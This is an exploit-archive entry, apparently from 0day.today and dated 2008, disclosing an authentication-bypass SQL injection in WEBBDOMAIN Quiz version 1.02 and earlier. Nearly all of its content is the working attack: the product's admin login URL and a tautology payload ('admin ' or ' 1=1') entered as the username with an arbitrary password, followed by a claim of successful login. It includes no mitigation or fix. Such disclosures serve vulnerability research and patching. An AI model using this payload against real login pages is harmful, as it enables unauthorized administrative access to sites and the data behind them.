id: 4062
date: 11/04/2008
title: WEBBDOMAIN Quiz <= 1.02 (Auth Bypass) SQL Injection Vulnerability
author: Hakxer
cves: 

=================================================================
WEBBDOMAIN Quiz <= 1.02 (Auth Bypass) SQL Injection Vulnerability
=================================================================


# [~] Discovered by : Hakxer
# [~] Type Gap : WEBBDOMAIN Quiz Auth Bypass
# [~] Script :http://webbdomain.com/php/quizen/
# [~] Greetz : Allah
##########################################################################

|| Auth Bypass ||

http://webbdomain.com/php/quizen/admin/

Username : admin ' or ' 1=1
password : Hakxer

Logged In ...

#  Proud To be a Muslim #
#_=END=_#




#  0day.today [2023-03-24]  #